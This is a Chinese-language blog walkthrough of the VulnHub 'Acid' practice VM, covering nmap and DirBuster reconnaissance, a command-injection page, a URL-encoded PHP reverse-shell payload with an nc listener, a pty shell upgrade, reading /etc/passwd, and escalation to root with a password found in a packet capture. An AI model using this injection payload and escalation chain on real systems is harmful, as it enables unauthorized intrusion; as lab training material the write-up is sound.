VulnHub渗透测试入门_Note-2018Dec05

Tutorial

VulnHub|渗透测试入门(一)

特别鸣谢: ~ 、~、各位亲朋好友

环境配置

  • 靶机:Acid虚拟机,可直接下载zip
  • 攻击机:Kali-Linux
    Kali所需软件:Burpsuite/dirbuster/wireshark (都可以通过apt-get install下载)

★Tips:
Kali Linux 是基于Debian的Linux发行版,它预装了很多渗透测试软件,包括nmap、Wireshark、John the Ripper,以及Aircrack-ng等。

正式开始

1.找到好朋友

==查看IP:==

$ ip address
image.png

==扫描靶机地址:==

★Tips:
NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。其基本功能有三个,一是探测一组主机是否在线;其次是扫描 主机端口,嗅探所提供的网络服务;还可以推断主机所用的操作系统 。

$ nmap -sP 192.168.171.0/24 -oN acid-ip.txt
or
$ nmap -sP 192.168.171.0/24     #这一条就是不把结果输出写进acid-ip.txt文件里
image.png

↑ 得到靶机Acid的IP为192.168.171.2? or 192.168.171.132
因为我们不是一气呵成完成这份note,所以Acid的ip以及本机Kali的ip会前后不一致.

==扫描靶机端口:==

$ nmap -p1-65535 -sV -oN acid-port.txt 192.168.171.132
or
$ nmap -p1-65535 -sV 192.168.171.132    #不写进文件
image.png

扫描到开放端口为33447

==浏览器访问192.168.171.132:33447==,可以得到如下网页:

image.png

2.开始玩耍

** 漏洞挖掘的详细思路 **
-- web挖掘思路:
(1) 查看每个网页的源码,看是否有提示;
(2) 暴破目录,用御剑或DirBuster,看是否有新网页,找新网页的漏洞;
-- Apache挖掘思路:
(1) 寻找Apache2.4.10有无已知漏洞可利用:没有发现可直接利用的漏洞。
(2) 到www.exploit-db.com查询有无exp:没有找到exp。
(3) Nessus扫描一下主机漏洞:没有扫描出漏洞。
实在找不到漏洞:单用户模式进入Ubuntu,看源码吧。

3.重头戏快来了

==Dirbuster扫描Acid路径:==

★Tips:
DirBuster是一个多线程的基于Java的应用程序设计用于暴力破解Web 应用服务器上的目录名和文件名的工具 。

↑扫描时间约为7分钟,得到如下结果:

index.php

还有其他的: include.php; error.php; cake.php; hacked.php ...

从刚才访问cake.php的时候(如上)页面标题为/Magic_Box,所以还有一个目录为/Magic_Box, 直接扫描Magic_Box的路径我们看到:Challenge/Magic_Box/command.php:

来直接看command.php.

4.重头戏真的来了!

-----
首先了解一下Burpsuite的操作:
Burpsuite新手指南
Burpsuite实战指南
整理了一下Burpsuite使用方法
1.检查Burpsuite-Proxy-Option-==Proxy Listener==->127.0.0.1:8080(specific address);
2.同时把==浏览器的proxy==改成127.0.0.1,端口为8080;
3.点击Burpsuite的Forward才能发送当前捕获的request,并收到response.

-----

刚才说到: 从刚才扫描的路径我们看到:Challenge/Magic_Box/command.php,那么我们现在在command.php这个页面输入一个IP地址

Burpsuite就可以拦截到Request, 点击Forward之后, 可以在http history看到相应的记录并查看Response. 可以看到ping的返回哦~

那就可以反弹shell
这里有个参考:各种语言反弹shell (持续更新)

Tutorial->==利用php反弹shell:==
具体操作如下:
==1==.Terminal开启4444端口监听:

$ nc -lvp 4444

==2==.使用Burpsuite拦截request, 并对request进行修改:
==为避免转义和中断,在get、post请求中输入payload需要进行url编码。==
把这条命令行放进Burpsuite-Decoder里面,右边选择Encode-URL. \

127.0.0.1;php -r '$sock=fsockopen("local ip address",port);exec("/bin/sh -i <&3 >&3 2>&3");'
image.png
image.png

反弹shell成功了!
但是不能使用su:

于是==使用python调用本地的shell==:

$ echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
$ python /tmp/asdf.py

成功了!

那么现在来==查看有哪些用户:==

$ cat /etc/passwd
or
$ cd /home

==查找每个用户的文件:==

$ find / -user acid 2>/dev/null     #注意2>/dev的>两边没有空格

Tutorial->发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件,将其拷贝的kali上,用Wireshark打开:

www-data...$ scp /sbin/raw_vs_isi/hint.pcapng root@192.168.171.134:/root/

然后==用wireshark打开,只看TCP协议的包==,可以看到聊天记录,然后发现saman的密码(!!?):1337hax0r

==su提权到saman==

再使用==sudo -i 提权到root==,密码同样是1337hax0r,获得位于root目录的flag.txt。


Congratulations!

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,732评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,496评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,264评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,807评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,806评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,675评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,029评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,683评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 41,704评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,666评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,773评论 1 332
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,413评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,016评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,978评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,204评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,083评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,503评论 2 343

推荐阅读更多精彩内容